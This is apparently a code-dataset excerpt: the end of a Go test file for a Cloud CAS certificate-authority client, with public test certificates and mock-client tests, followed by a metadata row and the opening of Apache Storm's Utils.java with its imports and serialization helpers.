4MxD5VrZFc51P50caMUdDZVrPveidChBYCU/9IM6vnRlZHx2HLjQ0qAvqHwY3rT0
xc7n+PfCo2YwZDAOBgNVHQ8BAf8EBAMCAQYwEgYDVR0TAQH/BAgwBgEB/wIBADAd
BgNVHQ4EFgQUSDlasiw0pRKyS7llhL0ZuVFNa9UwHwYDVR0jBBgwFoAUVWf1XtDK
Z3txQmH0oCGdQMBAvlgwCgYIKoZIzj0EAwIDSAAwRQIgMmsLcoC4KriXw+s+cZx2
bJMf6Mx/WESj31buJJhpzY0CIQCBUa/JtvS3nyce/4DF5tK2v49/NWHREgqAaZ57
DcYyHQ==
-----END CERTIFICATE-----`
testLeafCertificate = `-----BEGIN CERTIFICATE-----
MIIB1jCCAX2gAwIBAgIQQfOn+COMeuD8VYF1TiDkEzAKBggqhkjOPQQDAjAqMSgw
JgYDVQQDEx9Hb29nbGUgQ0FTIFRlc3QgSW50ZXJtZWRpYXRlIENBMB4XDTIwMDkx
NDIyNTE1NVoXDTMwMDkxMjIyNTE1MlowHTEbMBkGA1UEAxMSdGVzdC5zbWFsbHN0
ZXAuY29tMFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEAdUSRBrpgHFilN4eaGlN
nX2+xfjXa1Iwk2/+AensjFTXJi1UAIB0e+4pqi7Sen5E2QVBhntEHCrA3xOf7czg
P6OBkTCBjjAOBgNVHQ8BAf8EBAMCB4AwHQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsG
AQUFBwMCMB0GA1UdDgQWBBSYPbu4Tmm7Zze/hCePeZH1Avoj+jAfBgNVHSMEGDAW
gBRIOVqyLDSlErJLuWWEvRm5UU1r1TAdBgNVHREEFjAUghJ0ZXN0LnNtYWxsc3Rl
cC5jb20wCgYIKoZIzj0EAwIDRwAwRAIgY+nTc+RHn31/BOhht4JpxCmJPHxqFT3S
ojnictBudV0CIB87ipY5HV3c8FLVEzTA0wFwdDZvQraQYsthwbg2kQFb
-----END CERTIFICATE-----`
testSignedCertificate = `-----BEGIN CERTIFICATE-----
MIIB/DCCAaKgAwIBAgIQHHFuGMz0cClfde5kqP5prTAKBggqhkjOPQQDAjAqMSgw
JgYDVQQDEx9Hb29nbGUgQ0FTIFRlc3QgSW50ZXJtZWRpYXRlIENBMB4XDTIwMDkx
NTAwMDQ0M1oXDTMwMDkxMzAwMDQ0MFowHTEbMBkGA1UEAxMSdGVzdC5zbWFsbHN0
ZXAuY29tMFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEMqNCiXMvbn74LsHzRv+8
17m9vEzH6RHrg3m82e0uEc36+fZWV/zJ9SKuONmnl5VP79LsjL5SVH0RDj73U2XO
DKOBtjCBszAOBgNVHQ8BAf8EBAMCB4AwHQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsG
AQUFBwMCMB0GA1UdDgQWBBRTA2cTs7PCNjnps/+T0dS8diqv0DAfBgNVHSMEGDAW
gBRIOVqyLDSlErJLuWWEvRm5UU1r1TBCBgwrBgEEAYKkZMYoQAIEMjAwEwhjbG91
ZGNhcxMkZDhkMThhNjgtNTI5Ni00YWYzLWFlNGItMmY4NzdkYTNmYmQ5MAoGCCqG
SM49BAMCA0gAMEUCIGxl+pqJ50WYWUqK2l4V1FHoXSi0Nht5kwTxFxnWZu1xAiEA
zemu3bhWLFaGg3s8i+HTEhw4RqkHP74vF7AVYp88bAw=
-----END CERTIFICATE-----`
)
type testClient struct {
credentialsFile string
certificate *pb.Certificate
certificateAuthority *pb.CertificateAuthority
err error
}
func newTestClient(credentialsFile string) (CertificateAuthorityClient, error) {
if credentialsFile == "testdata/error.json" {
return nil, errTest
}
return &testClient{
credentialsFile: credentialsFile,
}, nil
}
func okTestClient() *testClient {
return &testClient{
credentialsFile: "testdata/credentials.json",
certificate: &pb.Certificate{
Name: testCertificateName,
PemCertificate: testSignedCertificate,
PemCertificateChain: []string{testIntermediateCertificate, testRootCertificate},
},
certificateAuthority: &pb.CertificateAuthority{
PemCaCertificates: []string{testIntermediateCertificate, testRootCertificate},
},
}
}
func failTestClient() *testClient {
return &testClient{
credentialsFile: "testdata/credentials.json",
err: errTest,
}
}
func badTestClient() *testClient {
return &testClient{
credentialsFile: "testdata/credentials.json",
certificate: &pb.Certificate{
Name: testCertificateName,
PemCertificate: "not a pem cert",
PemCertificateChain: []string{testIntermediateCertificate, testRootCertificate},
},
certificateAuthority: &pb.CertificateAuthority{
PemCaCertificates: []string{testIntermediateCertificate, "not a pem cert"},
},
}
}
func setTeeReader(t *testing.T, w *bytes.Buffer) {
t.Helper()
reader := rand.Reader
t.Cleanup(func() {
rand.Reader = reader
})
rand.Reader = io.TeeReader(reader, w)
}
func (c *testClient) CreateCertificate(ctx context.Context, req *pb.CreateCertificateRequest, opts ...gax.CallOption) (*pb.Certificate, error) {
return c.certificate, c.err
}
func (c *testClient) RevokeCertificate(ctx context.Context, req *pb.RevokeCertificateRequest, opts ...gax.CallOption) (*pb.Certificate, error) {
return c.certificate, c.err
}
func (c *testClient) GetCertificateAuthority(ctx context.Context, req *pb.GetCertificateAuthorityRequest, opts ...gax.CallOption) (*pb.CertificateAuthority, error) {
return c.certificateAuthority, c.err
}
func mustParseCertificate(t *testing.T, pemCert string) *x509.Certificate {
t.Helper()
crt, err := parseCertificate(pemCert)
if err != nil {
t.Fatal(err)
}
return crt
}
func TestNew(t *testing.T) {
tmp := newCertificateAuthorityClient
newCertificateAuthorityClient = func(ctx context.Context, credentialsFile string) (CertificateAuthorityClient, error) {
return newTestClient(credentialsFile)
}
t.Cleanup(func() {
newCertificateAuthorityClient = tmp
})
type args struct {
ctx context.Context
opts apiv1.Options
}
tests := []struct {
name string
args args
want *CloudCAS
wantErr bool
}{
{"ok", args{context.Background(), apiv1.Options{
CertificateAuthority: testAuthorityName,
}}, &CloudCAS{
client: &testClient{},
certificateAuthority: testAuthorityName,
}, false},
{"ok with credentials", args{context.Background(), apiv1.Options{
CertificateAuthority: testAuthorityName, CredentialsFile: "testdata/credentials.json",
}}, &CloudCAS{
client: &testClient{credentialsFile: "testdata/credentials.json"},
certificateAuthority: testAuthorityName,
}, false},
{"fail certificate authority", args{context.Background(), apiv1.Options{}}, nil, true},
{"fail with credentials", args{context.Background(), apiv1.Options{
CertificateAuthority: testAuthorityName, CredentialsFile: "testdata/error.json",
}}, nil, true},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
got, err := New(tt.args.ctx, tt.args.opts)
if (err != nil) != tt.wantErr {
t.Errorf("New() error = %v, wantErr %v", err, tt.wantErr)
return
}
if !reflect.DeepEqual(got, tt.want) {
t.Errorf("New() = %v, want %v", got, tt.want)
}
})
}
}
func TestNew_register(t *testing.T) {
tmp := newCertificateAuthorityClient
newCertificateAuthorityClient = func(ctx context.Context, credentialsFile string) (CertificateAuthorityClient, error) {
return newTestClient(credentialsFile)
}
t.Cleanup(func() {
newCertificateAuthorityClient = tmp
})
want := &CloudCAS{
client: &testClient{credentialsFile: "testdata/credentials.json"},
certificateAuthority: testAuthorityName,
}
newFn, ok := apiv1.LoadCertificateAuthorityServiceNewFunc(apiv1.CloudCAS)
if !ok {
t.Error("apiv1.LoadCertificateAuthorityServiceNewFunc(apiv1.CloudCAS) was not found")
return
}
got, err := newFn(context.Background(), apiv1.Options{
CertificateAuthority: testAuthorityName, CredentialsFile: "testdata/credentials.json",
})
if err != nil {
t.Errorf("New() error = %v", err)
return
}
if !reflect.DeepEqual(got, want) {
t.Errorf("New() = %v, want %v", got, want)
}
}
func TestNew_real(t *testing.T) {
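	// Clear GOOGLE_APPLICATION_CREDENTIALS for the duration of the test (restoring it in cleanup)
	// so the "fail default credentials" case cannot pick up real credentials from the environment.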
if v, ok := os.LookupEnv("GOOGLE_APPLICATION_CREDENTIALS"); ok {
os.Unsetenv("GOOGLE_APPLICATION_CREDENTIALS")
t.Cleanup(func() {
os.Setenv("GOOGLE_APPLICATION_CREDENTIALS", v)
})
}
type args struct {
ctx context.Context
opts apiv1.Options
}
tests := []struct {
name string
skipOnCI bool
args args
wantErr bool
}{
{"fail default credentials", true, args{context.Background(), apiv1.Options{CertificateAuthority: testAuthorityName}}, true},
{"fail certificate authority", false, args{context.Background(), apiv1.Options{}}, true},
{"fail with credentials", false, args{context.Background(), apiv1.Options{
CertificateAuthority: testAuthorityName, CredentialsFile: "testdata/missing.json",
}}, true},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
if tt.skipOnCI && os.Getenv("CI") == "true" {
t.SkipNow()
}
_, err := New(tt.args.ctx, tt.args.opts)
if (err != nil) != tt.wantErr {
t.Errorf("New() error = %v, wantErr %v", err, tt.wantErr)
}
})
}
}
func TestCloudCAS_GetCertificateAuthority(t *testing.T) {
root := mustParseCertificate(t, testRootCertificate)
type fields struct {
client CertificateAuthorityClient
certificateAuthority string
}
type args struct {
req *apiv1.GetCertificateAuthorityRequest
}
tests := []struct {
name string
fields fields
args args
want *apiv1.GetCertificateAuthorityResponse
wantErr bool
}{
{"ok", fields{okTestClient(), testCertificateName}, args{&apiv1.GetCertificateAuthorityRequest{}}, &apiv1.GetCertificateAuthorityResponse{
RootCertificate: root,
}, false},
{"ok with name", fields{okTestClient(), testCertificateName}, args{&apiv1.GetCertificateAuthorityRequest{
Name: testCertificateName,
}}, &apiv1.GetCertificateAuthorityResponse{
RootCertificate: root,
}, false},
{"fail GetCertificateAuthority", fields{failTestClient(), testCertificateName}, args{&apiv1.GetCertificateAuthorityRequest{}}, nil, true},
{"fail bad root", fields{badTestClient(), testCertificateName}, args{&apiv1.GetCertificateAuthorityRequest{}}, nil, true},
{"fail no pems", fields{&testClient{certificateAuthority: &pb.CertificateAuthority{}}, testCertificateName}, args{&apiv1.GetCertificateAuthorityRequest{}}, nil, true},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
c := &CloudCAS{
client: tt.fields.client,
certificateAuthority: tt.fields.certificateAuthority,
}
got, err := c.GetCertificateAuthority(tt.args.req)
if (err != nil) != tt.wantErr {
t.Errorf("CloudCAS.GetCertificateAuthority() error = %v, wantErr %v", err, tt.wantErr)
return
}
if !reflect.DeepEqual(got, tt.want) {
t.Errorf("CloudCAS.GetCertificateAuthority() = %v, want %v", got, tt.want)
}
})
}
}
func TestCloudCAS_CreateCertificate(t *testing.T) {
type fields struct {
client CertificateAuthorityClient
certificateAuthority string
}
type args struct {
req *apiv1.CreateCertificateRequest
}
tests := []struct {
name string
fields fields
args args
want *apiv1.CreateCertificateResponse
wantErr bool
}{
{"ok", fields{okTestClient(), testCertificateName}, args{&apiv1.CreateCertificateRequest{
Template: mustParseCertificate(t, testLeafCertificate),
Lifetime: 24 * time.Hour,
}}, &apiv1.CreateCertificateResponse{
Certificate: mustParseCertificate(t, testSignedCertificate),
CertificateChain: []*x509.Certificate{mustParseCertificate(t, testIntermediateCertificate)},
}, false},
{"fail Template", fields{okTestClient(), testCertificateName}, args{&apiv1.CreateCertificateRequest{
Lifetime: 24 * time.Hour,
}}, nil, true},
{"fail Lifetime", fields{okTestClient(), testCertificateName}, args{&apiv1.CreateCertificateRequest{
Template: mustParseCertificate(t, testLeafCertificate),
}}, nil, true},
{"fail CreateCertificate", fields{failTestClient(), testCertificateName}, args{&apiv1.CreateCertificateRequest{
Template: mustParseCertificate(t, testLeafCertificate),
Lifetime: 24 * time.Hour,
}}, nil, true},
{"fail Certificate", fields{badTestClient(), testCertificateName}, args{&apiv1.CreateCertificateRequest{
Template: mustParseCertificate(t, testLeafCertificate),
Lifetime: 24 * time.Hour,
}}, nil, true},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
c := &CloudCAS{
client: tt.fields.client,
certificateAuthority: tt.fields.certificateAuthority,
}
got, err := c.CreateCertificate(tt.args.req)
if (err != nil) != tt.wantErr {
t.Errorf("CloudCAS.CreateCertificate() error = %v, wantErr %v", err, tt.wantErr)
return
}
if !reflect.DeepEqual(got, tt.want) {
t.Errorf("CloudCAS.CreateCertificate() = %v, want %v", got, tt.want)
}
})
}
}
func TestCloudCAS_createCertificate(t *testing.T) {
leaf := mustParseCertificate(t, testLeafCertificate)
signed := mustParseCertificate(t, testSignedCertificate)
chain := []*x509.Certificate{mustParseCertificate(t, testIntermediateCertificate)}
type fields struct {
client CertificateAuthorityClient
certificateAuthority string
}
type args struct {
tpl *x509.Certificate
lifetime time.Duration
requestID string
}
tests := []struct {
name string
fields fields
args args
want *x509.Certificate
want1 []*x509.Certificate
wantErr bool
}{
{"ok", fields{okTestClient(), testAuthorityName}, args{leaf, 24 * time.Hour, "request-id"}, signed, chain, false},
{"fail CertificateConfig", fields{okTestClient(), testAuthorityName}, args{&x509.Certificate{}, 24 * time.Hour, "request-id"}, nil, nil, true},
{"fail CreateCertificate", fields{failTestClient(), testAuthorityName}, args{leaf, 24 * time.Hour, "request-id"}, nil, nil, true},
{"fail ParseCertificates", fields{badTestClient(), testAuthorityName}, args{leaf, 24 * time.Hour, "request-id"}, nil, nil, true},
{"fail create id", fields{okTestClient(), testAuthorityName}, args{leaf, 24 * time.Hour, "request-id"}, nil, nil, true},
}
	// Pre-generate the random bytes for all but the last test case and replay them from buf,
	// so the final "fail create id" case runs out of randomness and errors.
buf := new(bytes.Buffer)
setTeeReader(t, buf)
for i := 0; i < len(tests)-1; i++ {
_, err := uuid.NewRandomFromReader(rand.Reader)
if err != nil {
t.Fatal(err)
}
}
rand.Reader = buf
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
c := &CloudCAS{
client: tt.fields.client,
certificateAuthority: tt.fields.certificateAuthority,
}
got, got1, err := c.createCertificate(tt.args.tpl, tt.args.lifetime, tt.args.requestID)
if (err != nil) != tt.wantErr {
t.Errorf("CloudCAS.createCertificate() error = %v, wantErr %v", err, tt.wantErr)
return
}
if !reflect.DeepEqual(got, tt.want) {
t.Errorf("CloudCAS.createCertificate() got = %v, want %v", got, tt.want)
}
if !reflect.DeepEqual(got1, tt.want1) {
t.Errorf("CloudCAS.createCertificate() got1 = %v, want %v", got1, tt.want1)
}
})
}
}
func TestCloudCAS_RenewCertificate(t *testing.T) {
type fields struct {
client CertificateAuthorityClient
certificateAuthority string
}
type args struct {
req *apiv1.RenewCertificateRequest
}
tests := []struct {
name string
fields fields
args args
want *apiv1.RenewCertificateResponse
wantErr bool
}{
{"ok", fields{okTestClient(), testCertificateName}, args{&apiv1.RenewCertificateRequest{
Template: mustParseCertificate(t, testLeafCertificate),
Lifetime: 24 * time.Hour,
}}, &apiv1.RenewCertificateResponse{
Certificate: mustParseCertificate(t, testSignedCertificate),
CertificateChain: []*x509.Certificate{mustParseCertificate(t, testIntermediateCertificate)},
}, false},
{"fail Template", fields{okTestClient(), testCertificateName}, args{&apiv1.RenewCertificateRequest{
Lifetime: 24 * time.Hour,
}}, nil, true},
{"fail Lifetime", fields{okTestClient(), testCertificateName}, args{&apiv1.RenewCertificateRequest{
Template: mustParseCertificate(t, testLeafCertificate),
}}, nil, true},
{"fail CreateCertificate", fields{failTestClient(), testCertificateName}, args{&apiv1.RenewCertificateRequest{
Template: mustParseCertificate(t, testLeafCertificate),
Lifetime: 24 * time.Hour,
}}, nil, true},
{"fail Certificate", fields{badTestClient(), testCertificateName}, args{&apiv1.RenewCertificateRequest{
Template: mustParseCertificate(t, testLeafCertificate),
Lifetime: 24 * time.Hour,
}}, nil, true},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
c := &CloudCAS{
client: tt.fields.client,
certificateAuthority: tt.fields.certificateAuthority,
}
got, err := c.RenewCertificate(tt.args.req)
if (err != nil) != tt.wantErr {
t.Errorf("CloudCAS.RenewCertificate() error = %v, wantErr %v", err, tt.wantErr)
return
}
if !reflect.DeepEqual(got, tt.want) {
t.Errorf("CloudCAS.RenewCertificate() = %v, want %v", got, tt.want)
}
})
}
}
func TestCloudCAS_RevokeCertificate(t *testing.T) {
badExtensionCert := mustParseCertificate(t, testSignedCertificate)
for i, ext := range badExtensionCert.Extensions {
if ext.Id.Equal(asn1.ObjectIdentifier{1, 3, 6, 1, 4, 1, 37476, 9000, 64, 2}) {
badExtensionCert.Extensions[i].Value = []byte("bad-data")
}
}
type fields struct {
client CertificateAuthorityClient
certificateAuthority string
}
type args struct {
req *apiv1.RevokeCertificateRequest
}
tests := []struct {
name string
fields fields
args args
want *apiv1.RevokeCertificateResponse
wantErr bool
}{
{"ok", fields{okTestClient(), testCertificateName}, args{&apiv1.RevokeCertificateRequest{
Certificate: mustParseCertificate(t, testSignedCertificate),
ReasonCode: 1,
}}, &apiv1.RevokeCertificateResponse{
Certificate: mustParseCertificate(t, testSignedCertificate),
CertificateChain: []*x509.Certificate{mustParseCertificate(t, testIntermediateCertificate)},
}, false},
{"fail Extension", fields{okTestClient(), testCertificateName}, args{&apiv1.RevokeCertificateRequest{
Certificate: mustParseCertificate(t, testLeafCertificate),
ReasonCode: 1,
}}, nil, true},
{"fail Extension Value", fields{okTestClient(), testCertificateName}, args{&apiv1.RevokeCertificateRequest{
Certificate: badExtensionCert,
ReasonCode: 1,
}}, nil, true},
{"fail Certificate", fields{okTestClient(), testCertificateName}, args{&apiv1.RevokeCertificateRequest{
ReasonCode: 2,
}}, nil, true},
{"fail ReasonCode", fields{okTestClient(), testCertificateName}, args{&apiv1.RevokeCertificateRequest{
Certificate: mustParseCertificate(t, testSignedCertificate),
ReasonCode: 100,
}}, nil, true},
{"fail ReasonCode 7", fields{okTestClient(), testCertificateName}, args{&apiv1.RevokeCertificateRequest{
Certificate: mustParseCertificate(t, testSignedCertificate),
ReasonCode: 7,
}}, nil, true},
{"fail ReasonCode 8", fields{okTestClient(), testCertificateName}, args{&apiv1.RevokeCertificateRequest{
Certificate: mustParseCertificate(t, testSignedCertificate),
ReasonCode: 8,
}}, nil, true},
{"fail RevokeCertificate", fields{failTestClient(), testCertificateName}, args{&apiv1.RevokeCertificateRequest{
Certificate: mustParseCertificate(t, testSignedCertificate),
ReasonCode: 1,
}}, nil, true},
{"fail ParseCertificate", fields{badTestClient(), testCertificateName}, args{&apiv1.RevokeCertificateRequest{
Certificate: mustParseCertificate(t, testSignedCertificate),
ReasonCode: 1,
}}, nil, true},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
c := &CloudCAS{
client: tt.fields.client,
certificateAuthority: tt.fields.certificateAuthority,
}
got, err := c.RevokeCertificate(tt.args.req)
if (err != nil) != tt.wantErr {
t.Errorf("CloudCAS.RevokeCertificate() error = %v, wantErr %v", err, tt.wantErr)
return
}
if !reflect.DeepEqual(got, tt.want) {
t.Errorf("CloudCAS.RevokeCertificate() = %v, want %v", got, tt.want)
}
})
}
}
func Test_createCertificateID(t *testing.T) {
buf := new(bytes.Buffer)
setTeeReader(t, buf)
uuid, err := uuid.NewRandomFromReader(rand.Reader)
if err != nil {
t.Fatal(err)
}
rand.Reader = buf
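	// Replaying the captured bytes from buf yields the same UUID for the "ok" case; the drained buffer makes the "fail" case error.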
tests := []struct {
name string
want string
wantErr bool
}{
{"ok", uuid.String(), false},
{"fail", "", true},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
got, err := createCertificateID()
if (err != nil) != tt.wantErr {
t.Errorf("createCertificateID() error = %v, wantErr %v", err, tt.wantErr)
return
}
if got != tt.want {
t.Errorf("createCertificateID() = %v, want %v", got, tt.want)
}
})
}
}
func Test_parseCertificate(t *testing.T) {
type args struct {
pemCert string
}
tests := []struct {
name string
args args
want *x509.Certificate
wantErr bool
}{
{"ok", args{testLeafCertificate}, mustParseCertificate(t, testLeafCertificate), false},
{"ok intermediate", args{testIntermediateCertificate}, mustParseCertificate(t, testIntermediateCertificate), false},
{"fail pem", args{"not pem"}, nil, true},
{"fail parseCertificate", args{"-----BEGIN CERTIFICATE-----\nZm9vYmFyCg==\n-----END CERTIFICATE-----\n"}, nil, true},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
got, err := parseCertificate(tt.args.pemCert)
if (err != nil) != tt.wantErr {
t.Errorf("parseCertificate() error = %v, wantErr %v", err, tt.wantErr)
return
}
if !reflect.DeepEqual(got, tt.want) {
t.Errorf("parseCertificate() = %v, want %v", got, tt.want)
}
})
}
}
func Test_getCertificateAndChain(t *testing.T) {
type args struct {
certpb *pb.Certificate
}
tests := []struct {
name string
args args
want *x509.Certificate
want1 []*x509.Certificate
wantErr bool
}{
{"ok", args{&pb.Certificate{
Name: testCertificateName,
PemCertificate: testSignedCertificate,
PemCertificateChain: []string{testIntermediateCertificate, testRootCertificate},
}}, mustParseCertificate(t, testSignedCertificate), []*x509.Certificate{mustParseCertificate(t, testIntermediateCertificate)}, false},
{"fail PemCertificate", args{&pb.Certificate{
Name: testCertificateName,
PemCertificate: "foobar",
PemCertificateChain: []string{testIntermediateCertificate, testRootCertificate},
}}, nil, nil, true},
{"fail PemCertificateChain", args{&pb.Certificate{
Name: testCertificateName,
PemCertificate: testSignedCertificate,
PemCertificateChain: []string{"foobar", testRootCertificate},
}}, nil, nil, true},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
got, got1, err := getCertificateAndChain(tt.args.certpb)
if (err != nil) != tt.wantErr {
t.Errorf("getCertificateAndChain() error = %v, wantErr %v", err, tt.wantErr)
return
}
if !reflect.DeepEqual(got, tt.want) {
t.Errorf("getCertificateAndChain() got = %v, want %v", got, tt.want)
}
if !reflect.DeepEqual(got1, tt.want1) {
t.Errorf("getCertificateAndChain() got1 = %v, want %v", got1, tt.want1)
}
})
}
}
| ["\"CI\""] | [] | ["CI"] | [] | ["CI"] | go | 1 | 0 |
storm-core/src/jvm/org/apache/storm/utils/Utils.java | /**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.storm.utils;
import com.google.common.annotations.VisibleForTesting;
import org.apache.commons.compress.archivers.tar.TarArchiveEntry;
import org.apache.commons.compress.archivers.tar.TarArchiveInputStream;
import org.apache.commons.exec.CommandLine;
import org.apache.commons.exec.DefaultExecutor;
import org.apache.commons.exec.ExecuteException;
import org.apache.commons.io.FileUtils;
import org.apache.commons.io.IOUtils;
import org.apache.commons.io.input.ClassLoaderObjectInputStream;
import org.apache.commons.lang.StringUtils;
import org.apache.curator.ensemble.exhibitor.DefaultExhibitorRestClient;
import org.apache.curator.ensemble.exhibitor.ExhibitorEnsembleProvider;
import org.apache.curator.ensemble.exhibitor.Exhibitors;
import org.apache.curator.framework.CuratorFramework;
import org.apache.curator.framework.CuratorFrameworkFactory;
import org.apache.storm.Config;
import org.apache.storm.blobstore.BlobStore;
import org.apache.storm.blobstore.BlobStoreAclHandler;
import org.apache.storm.blobstore.ClientBlobStore;
import org.apache.storm.blobstore.InputStreamWithMeta;
import org.apache.storm.blobstore.LocalFsBlobStore;
import org.apache.storm.daemon.JarTransformer;
import org.apache.storm.generated.AccessControl;
import org.apache.storm.generated.AccessControlType;
import org.apache.storm.generated.AuthorizationException;
import org.apache.storm.generated.ClusterSummary;
import org.apache.storm.generated.ComponentCommon;
import org.apache.storm.generated.ComponentObject;
import org.apache.storm.generated.GlobalStreamId;
import org.apache.storm.generated.KeyNotFoundException;
import org.apache.storm.generated.Nimbus;
import org.apache.storm.generated.ReadableBlobMeta;
import org.apache.storm.generated.SettableBlobMeta;
import org.apache.storm.generated.StormTopology;
import org.apache.storm.generated.TopologyInfo;
import org.apache.storm.generated.TopologySummary;
import org.apache.storm.localizer.Localizer;
import org.apache.storm.nimbus.NimbusInfo;
import org.apache.storm.serialization.DefaultSerializationDelegate;
import org.apache.storm.serialization.SerializationDelegate;
import org.apache.thrift.TBase;
import org.apache.thrift.TDeserializer;
import org.apache.thrift.TException;
import org.apache.thrift.TSerializer;
import org.apache.zookeeper.ZooDefs;
import org.apache.zookeeper.data.ACL;
import org.apache.zookeeper.data.Id;
import org.json.simple.JSONValue;
import org.json.simple.parser.ParseException;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import org.yaml.snakeyaml.Yaml;
import org.yaml.snakeyaml.constructor.SafeConstructor;
import java.io.BufferedInputStream;
import java.io.BufferedOutputStream;
import java.io.BufferedReader;
import java.io.BufferedWriter;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.File;
import java.io.FileInputStream;
import java.io.FileNotFoundException;
import java.io.FileOutputStream;
import java.io.FileReader;
import java.io.FileWriter;
import java.io.FilenameFilter;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.OutputStream;
import java.io.OutputStreamWriter;
import java.io.PrintStream;
import java.io.RandomAccessFile;
import java.io.Serializable;
import java.lang.management.ManagementFactory;
import java.net.InetAddress;
import java.net.URL;
import java.net.URLDecoder;
import java.net.UnknownHostException;
import java.net.ServerSocket;
import java.nio.ByteBuffer;
import java.nio.file.FileSystems;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.nio.file.attribute.PosixFilePermission;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.Collection;
import java.util.Collections;
import java.util.Enumeration;
import java.util.HashMap;
import java.util.HashSet;
import java.util.Iterator;
import java.util.LinkedList;
import java.util.List;
import java.util.Map;
import java.util.Map.Entry;
import java.util.Set;
import java.util.TreeMap;
import java.util.UUID;
import java.util.concurrent.Callable;
import java.util.jar.JarEntry;
import java.util.jar.JarFile;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
import java.util.zip.GZIPInputStream;
import java.util.zip.GZIPOutputStream;
import java.util.zip.ZipEntry;
import java.util.zip.ZipFile;
import clojure.lang.RT;
public class Utils {
// A singleton instance allows us to mock delegated static methods in our
// tests by subclassing.
private static Utils _instance = new Utils();
/**
* Provide an instance of this class for delegates to use. To mock out
* delegated methods, provide an instance of a subclass that overrides the
* implementation of the delegated method.
* @param u a Utils instance
* @return the previously set instance
*/
public static Utils setInstance(Utils u) {
Utils oldInstance = _instance;
_instance = u;
return oldInstance;
}
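    // Illustrative test usage (hypothetical mock object), not part of the production code path:
    //   Utils previous = Utils.setInstance(new Utils() {
    //       @Override
    //       public <T> T newInstanceImpl(Class<T> klass) { return (T) mockInstance; }
    //   });
    //   try { /* run assertions against the mocked behavior */ } finally { Utils.setInstance(previous); }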
private static final Logger LOG = LoggerFactory.getLogger(Utils.class);
public static final String DEFAULT_STREAM_ID = "default";
public static final String DEFAULT_BLOB_VERSION_SUFFIX = ".version";
public static final String CURRENT_BLOB_SUFFIX_ID = "current";
public static final String DEFAULT_CURRENT_BLOB_SUFFIX = "." + CURRENT_BLOB_SUFFIX_ID;
private static ThreadLocal<TSerializer> threadSer = new ThreadLocal<TSerializer>();
private static ThreadLocal<TDeserializer> threadDes = new ThreadLocal<TDeserializer>();
private static SerializationDelegate serializationDelegate;
private static ClassLoader cl = ClassLoader.getSystemClassLoader();
public static final boolean IS_ON_WINDOWS = "Windows_NT".equals(System.getenv("OS"));
public static final String FILE_PATH_SEPARATOR = System.getProperty("file.separator");
public static final String CLASS_PATH_SEPARATOR = System.getProperty("path.separator");
public static final int SIGKILL = 9;
public static final int SIGTERM = 15;
static {
Map conf = readStormConfig();
serializationDelegate = getSerializationDelegate(conf);
}
public static <T> T newInstance(String klass) {
try {
return newInstance((Class<T>)Class.forName(klass));
} catch (Exception e) {
throw new RuntimeException(e);
}
}
public static <T> T newInstance(Class<T> klass) {
return _instance.newInstanceImpl(klass);
}
// Non-static impl methods exist for mocking purposes.
public <T> T newInstanceImpl(Class<T> klass) {
try {
return klass.newInstance();
} catch (Exception e) {
throw new RuntimeException(e);
}
}
public static JarTransformer jarTransformer(String klass) {
JarTransformer ret = null;
if (klass != null) {
ret = (JarTransformer)newInstance(klass);
}
return ret;
}
public static byte[] serialize(Object obj) {
return serializationDelegate.serialize(obj);
}
public static <T> T deserialize(byte[] serialized, Class<T> clazz) {
return serializationDelegate.deserialize(serialized, clazz);
}
public static <T> T thriftDeserialize(Class c, byte[] b, int offset, int length) {
try {
T ret = (T) c.newInstance();
TDeserializer des = getDes();
des.deserialize((TBase) ret, b, offset, length);
return ret;
} catch (Exception e) {
throw new RuntimeException(e);
}
}
public static byte[] javaSerialize(Object obj) {
try {
ByteArrayOutputStream bos = new ByteArrayOutputStream();
ObjectOutputStream oos = new ObjectOutputStream(bos);
oos.writeObject(obj);
oos.close();
return bos.toByteArray();
} catch (IOException e) {
throw new RuntimeException(e);
}
}
public static <T> T javaDeserialize(byte[] serialized, Class<T> clazz) {
try {
ByteArrayInputStream bis = new ByteArrayInputStream(serialized);
ObjectInputStream ois = new ClassLoaderObjectInputStream(cl, bis);
Object ret = ois.readObject();
ois.close();
return (T)ret;
} catch (IOException ioe) {
throw new RuntimeException(ioe);
} catch (ClassNotFoundException e) {
throw new RuntimeException(e);
}
}
public static byte[] gzip(byte[] data) {
try {
ByteArrayOutputStream bos = new ByteArrayOutputStream();
GZIPOutputStream out = new GZIPOutputStream(bos);
out.write(data);
out.close();
return bos.toByteArray();
} catch (IOException e) {
throw new RuntimeException(e);
}
}
public static byte[] gunzip(byte[] data) {
try {
ByteArrayOutputStream bos = new ByteArrayOutputStream();
ByteArrayInputStream bis = new ByteArrayInputStream(data);
GZIPInputStream in = new GZIPInputStream(bis);
byte[] buffer = new byte[1024];
int len = 0;
